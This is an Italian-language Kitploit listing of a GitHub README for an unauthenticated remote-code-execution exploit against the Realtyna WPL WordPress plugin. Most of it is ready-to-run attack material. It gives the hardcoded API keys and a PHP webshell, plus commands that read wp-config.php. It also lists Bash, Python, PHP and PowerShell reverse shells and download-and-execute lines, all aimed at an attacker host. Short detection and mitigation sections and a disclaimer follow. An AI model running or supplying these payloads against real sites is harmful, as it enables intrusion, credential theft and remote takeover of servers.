Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-13714 — Exploit RCE non autenticato per Realtyna WPL < 5.3.0 che carica una webshell PHP tramite chiave API hardcoded ed esegue comandi di sistema arbitrari. | Kitploit
Strumenti/GitHubGitHub/katransefa/cve-2026-13714
ExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingSviluppo Payload
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Exploit RCE non autenticato per Realtyna WPL < 5.3.0 che carica una webshell PHP tramite chiave API hardcoded ed esegue comandi di sistema arbitrari.

Vedi Repository
2 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Realtyna WPL < 5.3.0 - Exploit RCE non autenticato

Descrizione

Questo exploit prende di mira una vulnerabilità critica nel plugin Realtyna Organic IDX + WPL Real Estate nelle versioni precedenti alla 5.3.0. Il plugin utilizza credenziali hardcoded e consente il caricamento di file non autenticato che porta all'esecuzione remota di codice (RCE).

Dettagli della vulnerabilità

  • CVE ID: CVE-2026-13714
  • Versioni interessate: < 5.3.0
  • Tipo: Upload arbitrario di file non autenticato che porta a RCE
  • Ricercatore: Thom Stackhouse

Dettagli tecnici

Il plugin dispone di un'API I/O abilitata per impostazione predefinita con credenziali hardcoded:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

L'API non convalida i tipi di file, consentendo il caricamento arbitrario di file PHP.

Installazione

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

Utilizzo

Utilizzo di base

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

Comandi comuni

Target Linux

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Target Windows

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

Utilizzo avanzato

Reverse Shell (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Reverse Shell (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Caricamento ed esecuzione di payload personalizzati

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

Flusso dell'exploit

  1. Upload: Carica una webshell PHP (<?php system($_GET['c']); ?>)
  2. Posizione: File salvato in wp-content/uploads/WPL/<ID>/shell.php
  3. Esecuzione: Esegue i comandi tramite shell.php?c=COMMAND

Rilevamento

Come rilevare l'exploit

  • Controlla la presenza di file sospetti in /wp-content/uploads/WPL/*/
  • Monitora le richieste con i parametri: wplview=io, wplformat=io, cmd=set_property
  • Cerca richieste API sospette con credenziali hardcoded

Segni di compromissione

  • File PHP inattesi nelle directory di upload
  • Richieste web insolite con comandi di sistema
  • Nuovi utenti amministratore in WordPress
  • File .htaccess modificati

Mitigazione

Correzioni

  1. Aggiorna immediatamente alla versione 5.3.0 o successiva di WPL Real Estate
  2. Se non puoi aggiornare, disabilita l'API I/O:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. Cambia le credenziali hardcoded
  4. Implementa una corretta convalida dei tipi di file
  5. Limita le directory di caricamento dei file

Raccomandazioni di sicurezza

  • Mantieni aggiornati tutti i plugin WordPress
  • Utilizza un Web Application Firewall (WAF)
  • Esegui audit di sicurezza regolari
  • Monitora le directory di caricamento dei file
  • Disabilita le API non necessarie

Screenshot

Exploit riuscito

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi educativi e di test autorizzati. L'uso non autorizzato contro sistemi che non possiedi o per cui non hai il permesso di test è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

Utilizzo legale

  • Utilizza solo su sistemi che possiedi
  • Utilizza solo con esplicita autorizzazione scritta
  • Segui le pratiche di responsible disclosure
  • Segnala le vulnerabilità ai vendor

Licenza

Questo progetto è esclusivamente a scopo educativo. Usalo a tuo rischio.

Crediti

  • Ricercatore originale: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

Riferimenti

  • Pagina della vulnerabilità WPScan
  • CVE-2026-13714

Registro delle modifiche

v1.0 (2026-08-17)

  • Rilascio iniziale
  • Upload di file non autenticato
  • Esecuzione remota di codice
  • Supporto all'esecuzione di comandi

Contributi

Sentiti libero di aprire issue e inviare pull request per miglioramenti.

Supporto

Per problemi e domande, apri un'issue su GitHub.


⚠️ AVVISO: Questo strumento è fornito esclusivamente per scopi di ricerca sulla sicurezza e formazione. Ottieni sempre la corretta autorizzazione prima di testare qualsiasi sistema.

Scarica lo strumento